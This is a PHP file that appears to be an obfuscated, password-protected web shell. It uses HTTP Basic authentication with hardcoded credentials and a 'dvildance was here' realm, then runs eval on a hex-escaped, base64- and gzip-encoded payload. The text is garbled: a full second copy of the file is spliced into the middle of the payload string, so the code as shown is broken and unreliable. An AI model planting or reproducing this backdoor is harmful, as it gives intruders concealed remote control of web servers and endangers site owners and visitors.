<?php // --- pop-up

$user = "kontolodon";

$pass = "kontolodon";

 if (($_SERVER["PHP_AUTH_USER"] != $user) || (($_SERVER["PHP_AUTH_PW"]) != $pass))

 {

  header("WWW-Authenticate: Basic realm=\"dvildance was here\"");

  header("HTTP/1.0 401 Unauthorized");
  exit();

 } ${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x65\x6c\x6f\x65l\x76\x79\x6f\x75\x74"]="L\x69\x78";${"\x47\x4cO\x42\x41LS"}["\x77u\x74\x65p\x76"]="Cy\x74o";${${"GLO\x42\x41LS"}["\x77\x75t\x65p\x76"]}="Sy\x31L\x7a\x4eFQ\x4by\x7a\x4eL\x37\x47\x32\x56\x30\x73\x76\x73\x59\x59\x77\x39\x59\x70L\x69\x75\x4b\x4c\x38\x6bs\x4djT\x58Sq\x7aL\x7a\x30\x6eISS1K\x42rN\x4b85P\x7a\x63\x67\x71\x4c\x554\x6d\x4cq\x43\x43\x63l\x46q\x65\x61m\x63\x53\x6ep\x43\x62\x6e\x706R\x71\x41O\x30\x73Si\x33TUPHJ\x72N\x42\x45\x41\x74Y\x41";${"G\x4cOB\x41L\x53"}["t\x64\x62uhbv\x6c\x6c\x76"]="C\x79\x74\x6f";${${"GL\x4f\x42A\x4cS"}["\x65\x6co\x65\x6cvy\x6f\x75t"]}="8O\x68O\x70\x35\x50\x44\x62\x65\x51\x47H\x516\x44\x65E\x67S\x41\x2b\x31\x2b\x74\x39NJ\x47\x39g0\x46\x62\x6b\x38iljG\x35\x62H\x4eq\x6eO\x75m\x63\x36Hf\x6f\x47\x57F\x6b4\x39\x49l\x35rl\x47\x54\x73\x38\x38J\x4e\x714\x77\x41L\x68Z\x74\x31h/\x2b\x62\x71\x63\x30\x76\x51\x51\x54T\x58\x6e3tv\x6cN\x79\x4br\x33\x48\x6aly\x55\x67H\x73L\x46\x6f\x6cZl\x6d\x43\x4a\x44\x42L\x41\x72\x58WsR\x79R\x53\x61D\x53\x53\x57\x4a\x4d\x34\x6d\x6bLs\x46\x67rx5\x6d3\x62\x61\x36qV\x6612sg\x6erNNh\x762L\x63K7l\x37l\x7amo\x76i\x34\x778E\x54\x7a\x64D\x74\x64\x2b/Sf73\x477\x71\x6a\x76\x4ah7\x6cW\x301\x61\x4b\x47YK\x48\x64sY\x53\x77\x53w/Uxk\x43\x66\x62X\x76r\x43\x47\x71t\x623nj\x45\x6ek\x38\x45\x731\x4f\x49Iou7\x4c\x32VI6q\x42\x67\x31\x4e\x32j\x76\x45\x59\x63\x6c\x4d0\x35Km4L\x48P\x63OyP\x53\x75\x64\x72v\x6eGpL\x6aTG\x42\x71q\x39\x32\x37\x4bl/EE\x4crui\x58\x711pN7n\x378\x49\x32\x433\x38\x354\x35\x6an\x37\x62\x65\x79Q\x46Z\x632O\x73nYS\x66\x38\x74\x64\x76\x63\x67F\x46\x65\x55\x69\x68\x38dQPU\x2b\x58\x2bt\x4c\x32r\x6foF\x78\x43ku\x780q\x41\x579K\x41\x72\x56gtJj\x5at\x41iw\x41\x68z\x38R\x5882\x4b\x42\x66\x39\x4a\x46\x74\x50NQ\x32\x72\x72\x5a\x61\x2b\x725\x49\x6f\x426LSH\x75jU\x6f1D\x68\x65\x6e\x2bw\x67\x652\x2b\x467\x78Fk\x4bS\x59\x67\x52\x53t\x41\x62\x79zY\x39dTR8\x4a\x50w\x4c0\x51\x61p4Fk\x7arngv\x74uvR\x641\x63q\x4fE\x61\x35w\x66\x4b\x78Wg\x518\x5a\x42\x2b\x49\x54D\x53\x52\x50mTf8\x33z\x47t\x62\x64XGdf\x37\x47d\x63\x77X\x74\x32\x43\x51h\x66f\x61Zrs\x62\x38\x43L\x52\x67g\x47\x79O\x2bYq3\x76\x64\x78W\x75FV\x67t\x6e2\x79/Q\x43i9\x73\x37\x53\x6e\x55\x43Z\x52\x47Q7\x41\x5a\x6d\x613\x72\x4a\x7a\x5a\x50/\x6bj\x67FDu\x4dl\x69\x68\x6a\x5a\x77\x4b\x4d\x784M\x4b\x63/L\x6do\x71uG\x54\x30DjXQ\x6a\x52k\x35GiSr\x50\x6e\x46s\x71\x56\x43\x36\x43O\x39NN/\x4c6\x418gwT\x2bMzPL\x55\x64\x36\x45uX\x449zK\x32\x6b\x57\x4dj\x79IU2rZFTX\x63\x58\x51Jd\x4a\x43Sy\x37\x51\x61\x73EO\x45\x55dn\x42\x4cTWnM8om\x4e\x68g\x4bTw7\x4f\x39\x47\x6c/\x57\x61\x4b\x5a\x41\x354\x4b\x765U\x61lYu\x47\x62f\x56\x390\x6fV2f\x4c\x6d\x50De\x69\x57Om\x57Niw\x5aS\x62D\x<?php // --- pop-up

$user = "kontolodon";

$pass = "kontolodon";

 if (($_SERVER["PHP_AUTH_USER"] != $user) || (($_SERVER["PHP_AUTH_PW"]) != $pass))

 {

  header("WWW-Authenticate: Basic realm=\"dvildance was here\"");

  header("HTTP/1.0 401 Unauthorized");
  exit();

 } ${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x65\x6c\x6f\x65l\x76\x79\x6f\x75\x74"]="L\x69\x78";${"\x47\x4cO\x42\x41LS"}["\x77u\x74\x65p\x76"]="Cy\x74o";${${"GLO\x42\x41LS"}["\x77\x75t\x65p\x76"]}="Sy\x31L\x7a\x4eFQ\x4by\x7a\x4eL\x37\x47\x32\x56\x30\x73\x76\x73\x59\x59\x77\x39\x59\x70L\x69\x75\x4b\x4c\x38\x6bs\x4djT\x58Sq\x7aL\x7a\x30\x6eISS1K\x42rN\x4b85P\x7a\x63\x67\x71\x4c\x554\x6d\x4cq\x43\x43\x63l\x46q\x65\x61m\x63\x53\x6ep\x43\x62\x6e\x706R\x71\x41O\x30\x73Si\x33TUPHJ\x72N\x42\x45\x41\x74Y\x41";${"G\x4cOB\x41L\x53"}["t\x64\x62uhbv\x6c\x6c\x76"]="C\x79\x74\x6f";${${"GL\x4f\x42A\x4cS"}["\x65\x6co\x65\x6cvy\x6f\x75t"]}="8O\x68O\x70\x35\x50\x44\x62\x65\x51\x47H\x516\x44\x65E\x67S\x41\x2b\x31\x2b\x74\x39NJ\x47\x39g0\x46\x62\x6b\x38iljG\x35\x62H\x4eq\x6eO\x75m\x63\x36Hf\x6f\x47\x57F\x6b4\x39\x49l\x35rl\x47\x54\x73\x38\x38J\x4e\x714\x77\x41L\x68Z\x74\x31h/\x2b\x62\x71\x63\x30\x76\x51\x51\x54T\x58\x6e3tv\x6cN\x79\x4br\x33\x48\x6aly\x55\x67H\x73L\x46\x6f\x6cZl\x6d\x43\x4a\x44\x42L\x41\x72\x58WsR\x79R\x53\x61D\x53\x53\x57\x4a\x4d\x34\x6d\x6bLs\x46\x67rx5\x6d3\x62\x61\x36qV\x6612sg\x6erNNh\x762L\x63K7l\x37l\x7amo\x76i\x34\x778E\x54\x7a\x64D\x74\x64\x2b/Sf73\x477\x71\x6a\x76\x4ah7\x6cW\x301\x61\x4b\x47YK\x48\x64sY\x53\x77\x53w/Uxk\x43\x66\x62X\x76r\x43\x47\x71t\x623nj\x45\x6ek\x38\x45\x731\x4f\x49Iou7\x4c\x32VI6q\x42\x67\x31\x4e\x32j\x76\x45\x59\x63\x6c\x4d0\x35Km4L\x48P\x63OyP\x53\x75\x64\x72v\x6eGpL\x6aTG\x42\x71q\x39\x32\x37\x4bl/EE\x4crui\x58\x711pN7n\x378\x49\x32\x433\x38\x354\x35\x6an\x37\x62\x65\x79Q\x46Z\x632O\x73nYS\x66\x38\x74\x64\x76\x63\x67F\x46\x65\x55\x69\x68\x38dQPU\x2b\x58\x2bt\x4c\x32r\x6foF\x78\x43ku\x780q\x41\x579K\x41\x72\x56gtJj\x5at\x41iw\x41\x68z\x38R\x5882\x4b\x42\x66\x39\x4a\x46\x74\x50NQ\x32\x72\x72\x5a\x61\x2b\x725\x49\x6f\x426LSH\x75jU\x6f1D\x68\x65\x6e\x2bw\x67\x652\x2b\x467\x78Fk\x4bS\x59\x67\x52\x53t\x41\x62\x79zY\x39dTR8\x4a\x50w\x4c0\x51\x61p4Fk\x7arngv\x74uvR\x641\x63q\x4fE\x61\x35w\x66\x4b\x78Wg\x518\x5a\x42\x2b\x49\x54D\x53\x52\x50mTf8\x33z\x47t\x62\x64XGdf\x37\x47d\x63\x77X\x74\x32\x43\x51h\x66f\x61Zrs\x62\x38\x43L\x52\x67g\x47\x79O\x2bYq3\x76\x64\x78W\x75FV\x67t\x6e2\x79/Q\x43i9\x73\x37\x53\x6e\x55\x43Z\x52\x47Q7\x41\x5a\x6d\x613\x72\x4a\x7a\x5a\x50/\x6bj\x67FDu\x4dl\x69\x68\x6a\x5a\x77\x4b\x4d\x784M\x4b\x63/L\x6do\x71uG\x54\x30DjXQ\x6a\x52k\x35GiSr\x50\x6e\x46s\x71\x56\x43\x36\x43O\x39NN/\x4c6\x418gwT\x2bMzPL\x55\x64\x36\x45uX\x449zK\x32\x6b\x57\x4dj\x79IU2rZFTX\x63\x58\x51Jd\x4a\x43Sy\x37\x51\x61\x73EO\x45\x55dn\x42\x4cTWnM8om\x4e\x68g\x4bTw7\x4f\x39\x47\x6c/\x57\x61\x4b\x5a\x41\x354\x4b\x765U\x61lYu\x47\x62f\x56\x390\x6fV2f\x4c\x6d\x50De\x69\x57Om\x57Niw\x5aS\x62D\x45\x44\x78\x78h\x51wH\x4aPq\x4e\x76\x59\x56\x69\x6ax\x41\x42\x2b73\x4a\x59X\x65\x65p\x4d\x48pJ/YZOK\x63E2\x55\x57\x6eU\x65\x35\x79\x63\x73\x53\x70\x62\x53\x48\x4e\x5aM\x51\x2b\x532\x35\x4e\x5a\x43\x49\x61\x43\x6c\x63\x30\x6eS\x30\x47\x4e\x74kxFF\x73\x6b9xlSM\x4ez\x41\x48kM\x37k\x61\x42\x6epfMz\x6f\x56\x48y\x41\x75jf/\x2b\x33\x47\x6cs\x6a8/\x55895\x2b9\x420\x4fX1\x4er\x44\x63\x41\x6a\x62Yz\x63\x62\x43dxY1d\x467\x42k\x6d\x46\x4c0T\x55\x30i\x30\x38\x5arGkzGfM\x495hkD\x43Iw\x73pr\x61\x61f\x39\x75hx\x4f\x72uv\x31/\x72ey6\x59s\x39/\x64yH\x33j\x68/O\x6aJM\x30\x68\x753\x30\x32\x43XfLSuR\x52\x55\x77ri\x76\x71W/q\x76i/Q\x77\x57y\x6eE\x56vy\x37X\x65\x39\x54g\x75\x52tqQ\x54\x49d\x61\x77\x5aS\x65\x42\x6cf\x69\x6a\x4bVu\x4f\x63xW\x63X\x79fh1M\x41\x72\x7aj/8\x2b\x39\x62\x63Dd\x76\x2b\x74\x64u\x37HP0\x64\x48\x61n2\x2b0\x6d\x653m\x55/G\x61\x62\x34X\x34\x6d8g7\x38\x75\x39\x5a\x38t\x72\x77\x48f/n1\x517\x61/\x58\x58R\x62\x59\x58\x61UG\x48\x4an\x4d\x4dRK\x53\x50\x62\x32\x61qi\x37\x35V\x69E\x45\x61\x38\x45f\x41n9\x46\x55d\x55\x4b\x32Z\x63\x41\x77\x49\x65\x77YZ\x61\x63K/\x61\x69\x61ZgT\x46\x70i\x58\x49T\x41\x76\x53\x76\x7a\x775R\x73\x6c\x79m\x52z\x2b\x53\x619\x45\x6fD\x2b\x4c\x38\x78\x4b\x4c\x62\x4aJt\x569t\x47\x31\x33\x76LQ1rQ\x77\x71UD\x46\x42\x38\x34\x4fkNm\x6byp\x42p\x34x\x42k8\x51\x6b\x73U\x62\x72\x6c\x4c\x48\x68\x6er\x53\x42Jo\x45\x53l\x77\x59s\x78E\x554O\x48\x67\x59z\x50P\x33\x57g\x43\x57\x6d\x6d\x75\x54lX\x67xz\x67nijR\x43wx\x6d3\x6fO\x37\x74\x62zO\x7a\x2bM\x50/\x32J\x73\x51O\x79\x46g\x31\x59\x6f\x64\x7a7/\x66V1\x63lg\x32\x37\x43\x6c\x64\x65\x48\x618\x53\x6f\x36\x52\x48\x74\x65E\x55k\x4f\x75\x43\x45\x51iEQ\x4eo\x50\x78\x51\x45Qk2\x69O\x4c\x6d/\x52sj\x2b\x44\x42\x53\x61/W\x62WV5\x2b8\x54\x77\x41\x42w\x4ae\x37\x48P\x42OEw\x2b\x73T\x77\x45\x42\x77J\x657\x48\x4f\x42eE\x77\x2b\x63TwI\x42\x77J\x65\x37HN\x42uE\x77\x2bMTw\x4d\x42\x77\x4ae";eval(htmlspecialchars_decode(gzinflate(base64_decode(${${"\x47\x4c\x4f\x42\x41\x4cS"}["\x74\x64b\x75\x68\x62\x76l\x6c\x76"]}))));exit;
?>45\x44\x78\x78h\x51wH\x4aPq\x4e\x76\x59\x56\x69\x6ax\x41\x42\x2b73\x4a\x59X\x65\x65p\x4d\x48pJ/YZOK\x63E2\x55\x57\x6eU\x65\x35\x79\x63\x73\x53\x70\x62\x53\x48\x4e\x5aM\x51\x2b\x532\x35\x4e\x5a\x43\x49\x61\x43\x6c\x63\x30\x6eS\x30\x47\x4e\x74kxFF\x73\x6b9xlSM\x4ez\x41\x48kM\x37k\x61\x42\x6epfMz\x6f\x56\x48y\x41\x75jf/\x2b\x33\x47\x6cs\x6a8/\x55895\x2b9\x420\x4fX1\x4er\x44\x63\x41\x6a\x62Yz\x63\x62\x43dxY1d\x467\x42k\x6d\x46\x4c0T\x55\x30i\x30\x38\x5arGkzGfM\x495hkD\x43Iw\x73pr\x61\x61f\x39\x75hx\x4f\x72uv\x31/\x72ey6\x59s\x39/\x64yH\x33j\x68/O\x6aJM\x30\x68\x753\x30\x32\x43XfLSuR\x52\x55\x77ri\x76\x71W/q\x76i/Q\x77\x57y\x6eE\x56vy\x37X\x65\x39\x54g\x75\x52tqQ\x54\x49d\x61\x77\x5aS\x65\x42\x6cf\x69\x6a\x4bVu\x4f\x63xW\x63X\x79fh1M\x41\x72\x7aj/8\x2b\x39\x62\x63Dd\x76\x2b\x74\x64u\x37HP0\x64\x48\x61n2\x2b0\x6d\x653m\x55/G\x61\x62\x34X\x34\x6d8g7\x38\x75\x39\x5a\x38t\x72\x77\x48f/n1\x517\x61/\x58\x58R\x62\x59\x58\x61UG\x48\x4an\x4d\x4dRK\x53\x50\x62\x32\x61qi\x37\x35V\x69E\x45\x61\x38\x45f\x41n9\x46\x55d\x55\x4b\x32Z\x63\x41\x77\x49\x65\x77YZ\x61\x63K/\x61\x69\x61ZgT\x46\x70i\x58\x49T\x41\x76\x53\x76\x7a\x775R\x73\x6c\x79m\x52z\x2b\x53\x619\x45\x6fD\x2b\x4c\x38\x78\x4b\x4c\x62\x4aJt\x569t\x47\x31\x33\x76LQ1rQ\x77\x71UD\x46\x42\x38\x34\x4fkNm\x6byp\x42p\x34x\x42k8\x51\x6b\x73U\x62\x72\x6c\x4c\x48\x68\x6er\x53\x42Jo\x45\x53l\x77\x59s\x78E\x554O\x48\x67\x59z\x50P\x33\x57g\x43\x57\x6d\x6d\x75\x54lX\x67xz\x67nijR\x43wx\x6d3\x6fO\x37\x74\x62zO\x7a\x2bM\x50/\x32J\x73\x51O\x79\x46g\x31\x59\x6f\x64\x7a7/\x66V1\x63lg\x32\x37\x43\x6c\x64\x65\x48\x618\x53\x6f\x36\x52\x48\x74\x65E\x55k\x4f\x75\x43\x45\x51iEQ\x4eo\x50\x78\x51\x45Qk2\x69O\x4c\x6d/\x52sj\x2b\x44\x42\x53\x61/W\x62WV5\x2b8\x54\x77\x41\x42w\x4ae\x37\x48P\x42OEw\x2b\x73T\x77\x45\x42\x77J\x657\x48\x4f\x42eE\x77\x2b\x63TwI\x42\x77J\x65\x37HN\x42uE\x77\x2bMTw\x4d\x42\x77\x4ae";eval(htmlspecialchars_decode(gzinflate(base64_decode(${${"\x47\x4c\x4f\x42\x41\x4cS"}["\x74\x64b\x75\x68\x62\x76l\x6c\x76"]}))));exit;
?>
